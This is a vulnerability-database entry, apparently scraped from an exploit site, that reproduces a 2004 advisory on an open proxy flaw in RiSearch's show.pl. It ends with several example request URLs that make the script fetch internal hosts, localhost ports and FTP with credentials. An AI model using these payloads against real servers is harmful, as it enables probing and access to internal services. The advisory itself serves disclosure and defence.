Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackPhil RobinsonEXPLOITPACK:78FF8F6F0CEA7480FF02E45C2E942BCC
HistoryJul 27, 2004 - 12:00 a.m.

RiSearch 0.99 RiSearch Pro 3.2.6 - show.pl Open Proxy Relay

2004-07-2700:00:00
Phil Robinson
6
JSON

RiSearch 0.99 RiSearch Pro 3.2.6 - show.pl Open Proxy Relay

source: https://www.securityfocus.com/bid/10812/info

RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters.

A remote attacker may exploit this condition in order to launch attacks against local and public services in the context of the site that is hosting the vulnerable script.

http://www.example.com/cgi-bin/search/show.pl?url=http://www.google.com
http://www.example.com/cgi-bin/search/show.pl?url=http://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=http://localhost:8080
http://www.example.com/cgi-bin/search/show.pl?url=ftp://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=ftp://username:[email protected]
JSON